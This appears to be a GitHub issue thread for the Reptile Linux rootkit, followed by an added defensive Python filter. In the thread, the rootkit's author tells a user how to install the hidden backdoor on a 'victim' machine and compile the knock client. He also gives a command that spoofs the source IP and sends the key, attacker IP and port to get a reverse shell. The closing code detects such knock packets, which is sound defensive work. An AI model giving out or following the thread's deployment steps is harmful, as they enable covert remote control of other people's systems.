Comments (11)

f0rb1dd3n commented on July 20, 2024

You have to install the rootkit only on the victim machine. On your attacker machine you will only run the client.

I did the shell script and makefiles to generate the client on the victim to give you a way to attack from the victim to other hosts in the network. But from your main attack machine's perspective you only have to compile knock.c by just typing:

cd Reptile/sbin
gcc knock.c -o knock
./knock 

You have to choose the protocol, target address, source address (if you want to spoof your address), and the payload with key+ip+port.

You don't need to use netcat, because I have already implemented the listener; just use the -l option at the end. Something like this:

./knock -x icmp -s (spoofed ip) -t (target IP) -d "F0rb1dd3n (attacker IP) (attacker port)" -l

Take a look into the code and change the key on heavens_door.c if you want.

I think it helps you.

F0rb1dd3n

from reptile.

evelynEdison commented on July 20, 2024

Hello, should I run the ./heavens_door command first on the victim machine?
I ran the ./heavens_door command on the victim machine and ran lsof -i tcp:80, but nothing shows on the screen. I think it should listen on port 80.

from reptile.

f0rb1dd3n commented on July 20, 2024

No man, Reptile already runs heavens_door for you and hides its processes. You just have to run ./installer.sh install and nothing more. Also, heavens_door doesn't listen on any port; it is a port-knocking backdoor. It just inspects the packets that are being received on the machine and returns a shell if it is the right packet.

Originally I configured it just to inspect packets received via ICMP or TCP on port 80 or UDP on port 53. But that is irrelevant, you can change this. There is no listening port, only an inspection of packets that are targeting a port.

from reptile.

evelynEdison commented on July 20, 2024

Hello, I have a doubt about the <reverse IP> in the line below:

-d Data to knock on backdoor: "<key> <reverse IP> <reverse Port>"

If my real source ip is 192.168.2.13, should I use -d "F0rb1dd3n 31.2.861.291 4444" in reverse form instead of -d "F0rb1dd3n 192.168.2.13 4444"?

from reptile.

f0rb1dd3n commented on July 20, 2024

No man, you have to use the normal form -d "F0rb1dd3n 192.168.2.13 4444"

The client will do all the job for you.

from reptile.

f0rb1dd3n commented on July 20, 2024

@rabbpigPan are you having any other trouble? Can we close this issue?

from reptile.

evelynEdison commented on July 20, 2024

Yes, I am still having trouble in getting the backdoor to work. After I entered the correct source IP and target IP,

Knock Knock on Heaven's (Back)Door
Written by: F0rb1dd3n

Knock knock Neo...

[+] Knocking with UDP protocol
.........
[+] 59 bytes was sent

it only showed the information above and didn't prompt the reverse shell for a long time.

Does it support the NAT network or only work on the local network?

from reptile.

f0rb1dd3n commented on July 20, 2024

This backdoor does not support NAT, only the local network.

from reptile.

evelynEdison commented on July 20, 2024

Thanks for your reply. You can close the issue now.

from reptile.

commented on July 20, 2024

This backdoor does not support NAT, only the local network

Does not support the public network, only supports the internal network?

from reptile.

f0rb1dd3n commented on July 20, 2024

Just the internal, unless you have a NAT

from reptile.
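
For defenders, the packet shape described in this thread (ICMP, TCP to port 80 or UDP to port 53 carrying "<key> <reverse IP> <reverse Port>") can be turned into a triage filter for captured traffic. This is an added example, not code from the Reptile project or from any commenter; it assumes the knock string is visible unencrypted in the packet body, and `parse_ipv4`, `knock_candidate`, the packet builders, the 192.168.2.20 address and the `changed-key` value are constructed for illustration.

```python
import ipaddress
import re
import struct

ICMP, TCP, UDP = 1, 6, 17
# Match the knock by shape, not key value: the thread notes the key can be changed.
KNOCK_RE = re.compile(rb"(\S{1,64}) (\d{1,3}(?:\.\d{1,3}){3}) (\d{1,5})[\s\x00]*")

def parse_ipv4(pkt):
    """Return (protocol, destination port or None, payload) of a raw IPv4 packet."""
    proto, l4 = pkt[9], pkt[(pkt[0] & 0x0F) * 4:]
    if proto == ICMP:
        return proto, None, l4[8:]                      # skip 8-byte echo header
    if proto == UDP:
        return proto, struct.unpack("!H", l4[2:4])[0], l4[8:]
    if proto == TCP:
        return proto, struct.unpack("!H", l4[2:4])[0], l4[(l4[12] >> 4) * 4:]
    return proto, None, b""

def knock_candidate(pkt):
    """Return (key, ip, port) when a packet matches the knock shape, else None."""
    proto, dport, payload = parse_ipv4(pkt)
    if proto != ICMP and (proto, dport) not in ((TCP, 80), (UDP, 53)):
        return None                                     # not a carrier named in the thread
    m = KNOCK_RE.fullmatch(payload)
    if not m:
        return None
    try:
        addr = ipaddress.IPv4Address(m.group(2).decode())
    except ValueError:
        return None                                     # e.g. an octet above 255
    port = int(m.group(3))
    return (m.group(1).decode(errors="replace"), str(addr), port) if 1 <= port <= 65535 else None

# Constructed sample packets (built here, not captured traffic).
def ipv4_pkt(proto, l4, src=bytes([192, 168, 2, 13]), dst=bytes([192, 168, 2, 20])):
    return struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(l4), 0, 0, 64, proto, 0, src, dst) + l4

def udp(dport, data):
    return ipv4_pkt(UDP, struct.pack("!HHHH", 40000, dport, 8 + len(data), 0) + data)
def icmp(data):
    return ipv4_pkt(ICMP, struct.pack("!BBHHH", 8, 0, 0, 1, 1) + data)

SAMPLES = {
    "udp53 knock": udp(53, b"F0rb1dd3n 192.168.2.13 4444"),
    "icmp knock, other key": icmp(b"changed-key 192.168.2.13 4444"),
    "udp53 dns query": udp(53, b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x07example\x03com\x00\x00\x01\x00\x01"),
    "udp5353 same bytes": udp(5353, b"F0rb1dd3n 192.168.2.13 4444"),
}
```

Calling `knock_candidate` on each entry of `SAMPLES` flags the two knock-shaped packets and passes the ordinary DNS query and the packet sent to a port outside the carriers named in the thread.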
